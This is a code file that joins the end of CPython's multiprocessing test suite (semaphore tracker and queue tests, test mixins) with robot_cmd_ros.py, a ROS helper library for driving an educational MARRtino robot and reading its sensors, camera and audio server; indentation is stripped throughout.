import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
robot_cmd_ros.py | #!/usr/bin/env python
import time
import os
import socket
import math
import sys
from threading import Thread
from datetime import datetime
import rospy
import tf
import actionlib
import cv2
from std_msgs.msg import String
from geometry_msgs.msg import Twist, Quaternion, Pose, PoseWithCovarianceStamped
from sensor_msgs.msg import LaserScan, Range, Image, Joy
from control_msgs.msg import JointJog
from nav_msgs.msg import Odometry
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from cv_bridge import CvBridge, CvBridgeError
# Android phone sensors read with 'ROS Sensors Driver' App
from sensor_msgs.msg import Imu, NavSatFix, Illuminance, MagneticField
try:
from rococo_navigation.msg import FollowPersonAction, FollowPersonGoal
rococo_navigation_Found = True
except:
print("rococo_navigation not found")
rococo_navigation_Found = False
try:
from apriltags_ros.msg import AprilTagDetectionArray
AprilTagFound = True
except:
print("apriltag_ros not found")
AprilTagFound = False
AUDIO_SERVER_IP = '127.0.0.1'
AUDIO_SERVER_PORT = 9001
assock = None
use_robot = True
use_audio = True
robot_initialized = False
stop_request = False
logdir = os.getenv('HOME')+'/log/' # dir for writing log files (programs, images,... )
# Topic names
TOPIC_tag_detections = 'tag_detections'
TOPIC_scan = 'scan'
TOPIC_amcl_pose = 'amcl_pose'
TOPIC_cmd_vel = 'cmd_vel'
TOPIC_desired_cmd_vel = 'desired_cmd_vel'
TOPIC_odom = 'odom'
TOPIC_joints = 'cmd_joints_jog'
TOPIC_joy = 'joy'
ACTION_move_base = 'move_base'
TOPIC_sonar_0 = '/sonar_0'
TOPIC_sonar_1 = '/sonar_1'
TOPIC_sonar_2 = '/sonar_2'
TOPIC_sonar_3 = '/sonar_3'
TOPIC_GROUND_TRUTH = '/base_pose_ground_truth'
TOPIC_SETPOSE = '/setpose'
TOPIC_STAGESAY = '/stage_say'
# Android sensors
TOPIC_IMU = '/android/imu'
IMU_ = None
IMU_sub = None
TOPIC_FIX = '/android/fix'
FIX_ = None
FIX_sub = None
TOPIC_MAG = '/android/magnetic_field'
MAG_ = None
MAG_sub = None
TOPIC_ILL = '/android/illuminance'
ILL_ = None
ILL_sub = None
def IMU_cb(data):
global IMU_
IMU_ = data
def FIX_cb(data):
global FIX_
FIX_ = data
def MAG_cb(data):
global MAG_
MAG_ = data
def ILL_cb(data):
global ILL_
ILL_ = data
# functions available for the programmer
def accel_gyro():
global IMU_
return IMU_
def sat_nav():
global FIX_
return FIX_
def magnetometer():
global MAG_
return MAG_
def illuminance():
global ILL_
return ILL_
# gbn navigation present
use_desired_cmd_vel=False
# Good values
tv_good = 0.2
rv_good = 0.8
tv_min = 0.1
rv_min = 0.1
move_step = 1.0
# robot pose from odometry
odom_robot_pose = None
# robot pose from localization
map_robot_pose = None
# robot pose from ground truth simulation
gt_robot_pose = None
# move_base target pose
target_pose = None
# robot velocity vector [linear.x, angular.z]
odom_robot_vel = None
move_base_running = False
ac_movebase = None
def setMoveStep(x):
global move_step
move_step=x
def setMaxSpeed(x,r):
global tv_good, rv_good
tv_good=x
rv_good=r
def setRobotNamePrefix(prefix):
global TOPIC_tag_detections,TOPIC_scan,TOPIC_amcl_pose,TOPIC_cmd_vel,TOPIC_desired_cmd_vel, \
TOPIC_odom,TOPIC_joy,TOPIC_joints,ACTION_move_base, \
TOPIC_sonar_0,TOPIC_sonar_1,TOPIC_sonar_2,TOPIC_sonar_3
TOPIC_tag_detections = prefix+'/' + TOPIC_tag_detections
TOPIC_scan = prefix+'/'+TOPIC_scan
TOPIC_amcl_pose = prefix+'/'+TOPIC_amcl_pose
TOPIC_cmd_vel = prefix+'/'+TOPIC_cmd_vel
TOPIC_desired_cmd_vel = prefix+'/'+TOPIC_desired_cmd_vel
TOPIC_odom = prefix+'/'+TOPIC_odom
TOPIC_joints = prefix + '/' + TOPIC_joints
TOPIC_joy = prefix + '/' + TOPIC_joy
ACTION_move_base = prefix+'/'+ACTION_move_base
TOPIC_sonar_0 = prefix+'/'+TOPIC_sonar_0
TOPIC_sonar_1 = prefix+'/'+TOPIC_sonar_1
TOPIC_sonar_2 = prefix+'/'+TOPIC_sonar_2
TOPIC_sonar_3 = prefix+'/'+TOPIC_sonar_3
TOPIC_GROUND_TRUTH = prefix+'/'+TOPIC_GROUND_TRUTH
TOPIC_SETPOSE = prefix+'/'+TOPIC_SETPOSE
TOPIC_STAGESAY = prefix+'/'+TOPIC_STAGESAY
def setAudioConnection(ip, port=9001):
global AUDIO_SERVER_IP, AUDIO_SERVER_PORT
AUDIO_SERVER_IP = ip
AUDIO_SERVER_PORT = port
PARAM_gbnEnabled = '/gradientBasedNavigation/gbnEnabled'
def enableObstacleAvoidance(value=True):
global use_desired_cmd_vel
rospy.set_param(PARAM_gbnEnabled, value)
use_desired_cmd_vel = value
def robot_stop_request(): # stop until next begin()
global stop_request
stop_request = True
if (use_robot):
stop()
print("stop request")
# Condition Variables and Functions
tag_trigger_ = False
tag_id_ = -1
tag_distance_ = 0
tag_angle_ = 0
tag_count = 25
def tagTrigger():
global tag_trigger_
return tag_trigger_
def tagID():
global tag_id_
return tag_id_
def tagDistance():
global tag_distance_
return tag_distance_
def tagAngle():
global tag_angle_
return tag_angle_
def tag_trigger():
return tagTrigger()
def tag_id():
return tagID()
def tag_distance():
return tagDistance()
def tag_angle():
return tagAngle()
laser_center_dist = 10
laser_left_dist = 10
laser_right_dist = 10
laser_back_dist = 10
def laser_center_distance():
global laser_center_dist
return laser_center_dist
def getRobotPose(frame=None):
return get_robot_pose(frame)
def get_robot_pose(frame=None): # returns [x,y,theta]
# frame: 'odom', 'map', 'gt'
global odom_robot_pose, map_robot_pose, gt_robot_pose
if frame==None: # auto detect
if map_robot_pose is not None:
return list(map_robot_pose)
else:
return list(odom_robot_pose)
elif frame=='odom':
return list(odom_robot_pose)
elif frame=='map':
return list(map_robot_pose)
else: # frame=='gt':
return list(gt_robot_pose)
def getRobotVel():
return get_robot_vel()
def get_robot_vel():
global odom_robot_vel
return list(odom_robot_vel)
def obstacleDistance(direction=0):
return obstacle_distance(direction=0)
def obstacle_distance(direction=0):
global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
if (direction==0): #front
return laser_center_dist
elif (direction==90): #left
return laser_left_dist
elif (direction==-90 or direction==270): # right
return laser_right_dist
elif (abs(direction)==180): # back
return laser_back_dist
def distance(p1,p2):
dx = p1[0]-p2[0]
dy = p1[1]-p2[1]
dx2 = dx*dx
dy2 = dy*dy
return math.sqrt(dx2+dy2)
# ROS param access
def set_global_param(var, value):
param = '/MARRtino/params/'+var
now = rospy.Time.now()
pd = {}
pd['value'] = value
pd['timestamp'] = now.secs
rospy.set_param(param, pd)
def get_global_param(var):
param = '/MARRtino/params/'+var
value = ''
if rospy.has_param(param):
value = rospy.get_param(param,'')
return value
def del_global_param(var):
param = '/MARRtino/params/'+var
if rospy.has_param(param):
rospy.delete_param(param)
def event():
pd = get_global_param('event')
if (pd==''):
return ''
now = rospy.Time.now()
if (now.secs - pd['timestamp'] < 5): # last 5 seconds
del_global_param('event')
return pd['value']
else:
return ''
# ROS publishers/subscribers
cmd_pub = None # cmd_vel publisher
des_cmd_pub = None # desired_cmd_vel publisher
tag_sub = None # tag_detection subscriber
laser_sub = None # laser subscriber
odom_sub = None # odom subscriber
joints_pub = None # joint publisher
joy_sub = None # Joystick subscriber
localizer_sub = None
sonar_sub_0 = None
sonar_sub_1 = None
sonar_sub_2 = None
sonar_sub_3 = None
stage_setpose_pub = None # Stage setpose (needs stagerosPeople)
stage_say_pub = None # Stage say (needs stagerosPeople)
# ROS Callback functions
def tag_cb(data):
global tag_trigger_, tag_count, tag_id_, tag_distance_, tag_angle_
v = data.detections
if (len(v)>0):
tag_id_ = v[0].id
tag_distance_ = v[0].pose.pose.position.z
tag_angle_ = math.atan2(-v[0].pose.pose.position.x,v[0].pose.pose.position.z)*180.0/math.pi
tag_trigger_ = True
tag_count = 3 # about seconds
# print 'tag ',tag_id_,' distance ',tag_distance_
# print 'tag trigger = ',tag_trigger_
else:
if (tag_trigger):
tag_count = tag_count - 1
# print 'tag count = ',tag_count
if (tag_count==0):
tag_trigger_ = False
tag_id_ = -1
tag_distance_ = 0
tag_angle_ = 0
def laser_cb(data):
global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
nc = len(data.ranges)/2
nr = int((data.angle_max - math.pi/2)/data.angle_increment)
nl = len(data.ranges) - nr
laser_center_dist = min(data.ranges[nc-10:nc+10])
try:
laser_left_dist = min(data.ranges[nl-10:nl+10])
laser_right_dist = min(data.ranges[nr-10:nr+10])
except:
pass
#laser_left_dist = -1
#laser_right_dist = -1
#print("angle min %.3f max %.3f inc %.6f" %(data.angle_min, data.angle_max, data.angle_increment))
#print("center %.3f left %.3f right %.3f" %(laser_center_dist, laser_left_dist, laser_right_dist))
def sonar_cb(data):
global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
r = data.range # ??? *0.75/0.265 #scale the value of the range in meters
if(data.header.frame_id == "/sonar_frame_0"): # front
laser_center_dist = r
elif(data.header.frame_id == "/sonar_frame_1"): # right
laser_right_dist = r
elif(data.header.frame_id == "/sonar_frame_3"): # left
laser_left_dist = r
elif(data.header.frame_id == "/sonar_frame_2"): # back
laser_back_dist = r
def odom_cb(data):
global odom_robot_pose, odom_robot_vel
if (odom_robot_pose is None):
odom_robot_pose = [0,0,0]
odom_robot_pose[0] = data.pose.pose.position.x
odom_robot_pose[1] = data.pose.pose.position.y
o = data.pose.pose.orientation
q = (o.x, o.y, o.z, o.w)
euler = tf.transformations.euler_from_quaternion(q)
odom_robot_pose[2] = euler[2] # yaw
#odomframe = data.header.frame_id
if (odom_robot_vel is None):
odom_robot_vel = [0,0]
odom_robot_vel[0] = data.twist.twist.linear.x
odom_robot_vel[1] = data.twist.twist.angular.z
def localizer_cb(data):
global map_robot_pose
if (map_robot_pose is None):
map_robot_pose = [0,0,0]
map_robot_pose[0] = data.pose.pose.position.x
map_robot_pose[1] = data.pose.pose.position.y
o = data.pose.pose.orientation
q = (o.x, o.y, o.z, o.w)
euler = tf.transformations.euler_from_quaternion(q)
map_robot_pose[2] = euler[2] # yaw
def groundtruth_cb(data):
global gt_robot_pose
if (gt_robot_pose is None):
gt_robot_pose = [0,0,0]
gt_robot_pose[0] = data.pose.pose.position.x
gt_robot_pose[1] = data.pose.pose.position.y
o = data.pose.pose.orientation
q = (o.x, o.y, o.z, o.w)
euler = tf.transformations.euler_from_quaternion(q)
gt_robot_pose[2] = euler[2] # yaw
# speed/jog from Joystick
joy_cmd_vel = [0, 0]
def joy_cb(data):
global joy_cmd_vel
joy_cmd_vel = [data.axes[1], data.axes[2]]
def getJoyVel():
return joy_cmd_vel
cvbridge = None
cvimage = None
def image_cb(data):
global cvbridge, cvimage
# Convert image to OpenCV format
try:
if cvbridge is None:
cvbridge = CvBridge()
cvimage = cvbridge.imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
print(e)
# select topic of type sensor_msgs/Image
def autoImageTopic():
topics = rospy.get_published_topics()
for t in topics:
if t[1]=='sensor_msgs/Image' and 'depth' not in t[0] and '/ir/' not in t[0] \
and 'person' not in t[0] and 'tag' not in t[0]:
return t[0]
return None
# Audio client
run_audio_connect = True
audio_connected = False
def audio_connect_thread():
global run_audio_connect, assock
print("Audio enabled, Connecting...")
run_audio_connect = True
timeout = 5
while run_audio_connect and timeout>0:
assock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
assock.connect((AUDIO_SERVER_IP, AUDIO_SERVER_PORT))
print("Audio connected.")
run_audio_connect = False
audio_connected = True
except:
print("Cannot connect to audio server %s:%d" %(AUDIO_SERVER_IP, AUDIO_SERVER_PORT))
time.sleep(1)
timeout -= 1
run_audio_connect = False
# Begin/end
def begin(nodename='robot_cmd', init_node=True):
global cmd_pub, des_cmd_pub, odom_sub, gt_sub, joints_pub, joy_sub, tag_sub, laser_sub, \
sonar_sub_0, sonar_sub_1, sonar_sub_2, sonar_sub_3, \
stage_say_pub, stage_setpose_pub, \
odom_robot_pose, robot_initialized, stop_request, \
use_robot, use_audio, audio_connected
print('begin')
stop_request = False
if (use_audio and not audio_connected):
# Run audio connection thread
t = Thread(target=audio_connect_thread, args=())
t.start()
time.sleep(0.5)
if (robot_initialized):
return
# blocking function if roscore not available !!!
# does not throw exception
if init_node:
rospy.init_node(nodename, disable_signals=True)
if AprilTagFound:
tag_sub = rospy.Subscriber(TOPIC_tag_detections, AprilTagDetectionArray, tag_cb)
laser_sub = rospy.Subscriber(TOPIC_scan, LaserScan, laser_cb)
sonar_sub_0 = rospy.Subscriber(TOPIC_sonar_0, Range, sonar_cb)
sonar_sub_1 = rospy.Subscriber(TOPIC_sonar_1, Range, sonar_cb)
sonar_sub_2 = rospy.Subscriber(TOPIC_sonar_2, Range, sonar_cb)
sonar_sub_3 = rospy.Subscriber(TOPIC_sonar_3, Range, sonar_cb)
localizer_sub = rospy.Subscriber(TOPIC_amcl_pose, PoseWithCovarianceStamped, localizer_cb)
joy_sub = rospy.Subscriber(TOPIC_joy, Joy, joy_cb)
IMU_sub = rospy.Subscriber(TOPIC_IMU, Imu, IMU_cb)
FIX_sub = rospy.Subscriber(TOPIC_FIX, NavSatFix, FIX_cb)
MAG_sub = rospy.Subscriber(TOPIC_MAG, MagneticField, MAG_cb)
ILL_sub = rospy.Subscriber(TOPIC_ILL, Illuminance, ILL_cb)
if (use_robot):
print("Robot enabled")
cmd_pub = rospy.Publisher(TOPIC_cmd_vel, Twist, queue_size=1)
des_cmd_pub = rospy.Publisher(TOPIC_desired_cmd_vel, Twist, queue_size=1)
odom_sub = rospy.Subscriber(TOPIC_odom, Odometry, odom_cb)
gt_sub = rospy.Subscriber(TOPIC_GROUND_TRUTH, Odometry, groundtruth_cb)
joints_pub = rospy.Publisher(TOPIC_joints, JointJog, queue_size=1)
stage_setpose_pub = rospy.Publisher(TOPIC_SETPOSE, Pose, queue_size=1, latch=True)
stage_say_pub = rospy.Publisher(TOPIC_STAGESAY, String, queue_size=1, latch=True)
print("Waiting for robot pose... (5 seconds)")
delay = 0.25 # sec
rate = rospy.Rate(1/delay) # Hz
try:
rate.sleep()
timeout = 5 #seconds
while (odom_robot_pose is None and timeout>0):
rate.sleep()
timeout -= delay
except KeyboardInterrupt:
pass
if (odom_robot_pose is None):
print("Robot pose not received. Using [0,0,0]")
odom_robot_pose = [0,0,0] # default value
robot_initialized = True
def end():
global robot_initialized, stop_request
if not robot_initialized:
return
if (use_robot):
stop()
stop_request = True
if (use_audio):
global run_audio_connect, audio_connected
run_audio_connect = False
global assock
if assock != None:
assock.close()
assock=None
audio_connected = False
try:
rospy.sleep(0.5) # make sure stuff ends
except:
pass
print('end')
# to unregister all the subscribers
def unregisterAll():
#sub_XXX.unregister()
pass
sub_image = None
def startCameraGrabber():
global sub_image
img_topic = autoImageTopic()
if img_topic != None:
print("Image topic: %s" %img_topic)
sub_image = rospy.Subscriber(img_topic, Image, image_cb)
time.sleep(1)
def stopCameraGrabber():
global sub_image
if sub_image != None:
sub_image.unregister()
def getImage(tmsleep=3):
get_image(tmsleep)
def get_image(tmsleep=3):
global cvimage
startCameraGrabber() # wait 1 sec for an image
time.sleep(tmsleep)
stopCameraGrabber()
dateTimeObj = datetime.now()
timestampStr = dateTimeObj.strftime("%Y%m%d-%H%M%S")
cv2.imwrite(os.getenv('MARRTINO_APPS_HOME')+'/www/viewer/img/lastimage.jpg', cvimage)
cv2.imwrite('%s/%s.jpg' %(logdir,timestampStr), cvimage)
return cvimage
def getWebImage(objcat=None):
get_web_image(objcat)
def get_web_image(objcat=None):
rchomelearnros_import()
img = webimages.take_image(objcat)
cv2.imwrite(os.getenv('MARRTINO_APPS_HOME')+'/www/viewer/img/lastimage.jpg', img)
return img
# Haar detector
def findCascadeModel():
trylist = ['/usr/share/opencv/', '/opt/ros/kinetic/share/OpenCV-3.3.1-dev/' ]
for t in trylist:
f = t + 'haarcascades/haarcascade_frontalface_default.xml'
if os.path.isfile(f):
return cv2.CascadeClassifier(f)
return None
faceCascade = None
def faceDetection(img):
face_detection(img)
def face_detection(img):
global faceCascade
if faceCascade is None:
faceCascade = findCascadeModel()
if faceCascade is None:
print("ERROR Cannot find Haar cascade model")
return -1
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30)
)
return len(faces)
# rc-home-learn-ros import
rchomelearnros_imported = False
mobilenet_objrec = None
webimages = None
def rchomelearnros_import():
global rchomelearnros_imported, mobilenet_objrec, webimages
if rchomelearnros_imported:
return
path = None
try:
import rospkg
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
# get the file path for rospy_tutorials
path = rospack.get_path('rc-home-edu-learn-ros')
except Exception as e:
#print(e)
path = os.getenv('HOME')+'/src/rc-home-edu-learn-ros'
print('rc-home-edu-learn-ros path: %s' %path)
try:
sys.path.append(path+'/rchomeedu_vision/scripts')
import mobilenet_objrec, webimages
rchomelearnros_imported = True
except Exception as e:
print(e)
print('Cannot import mobilenet_objrec, webimages modules')
# Object recognition with mobilenet
monet = None
def mobilenetObjrec(img):
return mobilenet_objrec(img)
def mobilenet_objrec(img):
global monet
if monet is None:
rchomelearnros_import()
try:
monet = mobilenet_objrec.MNetObjRec()
except Exception as e:
print(e)
return 'ERROR Mobilenet not available'
r = monet.evalCVImage(img)
return r
def ready():
global robot_initialized
return robot_initialized
# check if program can run now
def marrtino_ok():
return marrtinoOK()
def marrtinoOK():
global robot_initialized, stop_request
return robot_initialized and not stop_request and not rospy.is_shutdown()
# Robot motion
def setSpeed(lx,az,tm,stopend=False):
return set_speed(lx,az,tm,stopend)
def set_speed(lx,az,tm,stopend=False):
global cmd_pub, des_cmd_pub, use_desired_cmd_vel, stop_request, tv_good, rv_good
if (stop_request and (lx!=0.0 or az!=0.0)):
raise Exception("setSpeed called in stop_request mode")
delay = 0.1 # sec
rate = rospy.Rate(1/delay) # Hz
cnt = 0.0
msg = Twist()
msg.linear.x = lx
msg.angular.z = az
msg.linear.y = msg.linear.z = msg.angular.x = msg.angular.y = 0
while not rospy.is_shutdown() and cnt<=tm and not stop_request:
if (use_desired_cmd_vel):
des_cmd_pub.publish(msg)
else:
cmd_pub.publish(msg)
cnt = cnt + delay
try:
rate.sleep()
except KeyboardInterrupt:
print("User KeyboardInterrupt")
return False
if (stopend):
msg.linear.x = 0
msg.angular.z = 0
cmd_pub.publish(msg)
try:
rate.sleep()
except:
pass
return True
def setSpeed4W(fl,fr,bl,br,tm,stopend=False):
vlimit = 0.3 # limit 0.3 m/s
if math.fabs(fl)>vlimit:
fl = fl / math.fabs(fl) * vlimit
if math.fabs(fr)>vlimit:
fr = fr / math.fabs(fr) * vlimit
if math.fabs(bl)>vlimit:
bl = bl / math.fabs(bl) * vlimit
if math.fabs(br)>vlimit:
br = br / math.fabs(br) * vlimit
fln = - fl * 0.02
frn = + fr * 0.02
bln = + bl * 0.02
brn = - br * 0.02
cnt = 0.0
delay = 0.1 # sec
rate = rospy.Rate(1/delay) # Hz
msg = JointJog()
msg.joint_names = ["front_left_wheel", "front_right_wheel", "back_left_wheel", "back_right_wheel"]
msg.velocities = [fln,frn,bln,brn]
msg.duration = delay
while not rospy.is_shutdown() and cnt<=tm and not stop_request:
joints_pub.publish(msg)
cnt = cnt + delay
try:
rate.sleep()
except KeyboardInterrupt:
return False
if (stopend):
msg.velocities = [0,0,0,0]
joints_pub.publish(msg)
try:
rate.sleep()
except:
pass
return True
def stop():
global cmd_pub, joints_pub, move_base_running
print('stop')
if (move_base_running):
exec_movebase_stop()
setSpeed(0,0,0.2,True);
setSpeed4W(0,0,0,0,0.2,True);
def forward(r=1):
global tv_good
print('forward %.2f' %r)
v = exec_move_REL(move_step*r)
return v
def backward(r=1):
print('backward %.2f' %r)
return exec_move_REL(-move_step*r)
def left(r=1):
print('left %.2f' %r)
return exec_turn_REL(90*r)
def right(r=1):
print('right %.2f' %r)
return exec_turn_REL(-90*r)
# set stage pose
def stage_setpose(gx,gy,gth_deg):
global stage_setpose_pub
p = Pose()
p.position.x=gx
p.position.y=gy
p.position.z=0
th = gth_deg * math.pi / 180.0
quaternion = tf.transformations.quaternion_from_euler(0, 0, th)
#type(pose) = geometry_msgs.msg.Pose
p.orientation.x = quaternion[0]
p.orientation.y = quaternion[1]
p.orientation.z = quaternion[2]
p.orientation.w = quaternion[3]
stage_setpose_pub.publish(p)
# map frame goto (requires localization)
def goto(gx, gy, gth_deg):
return exec_movebase(gx, gy, gth_deg)
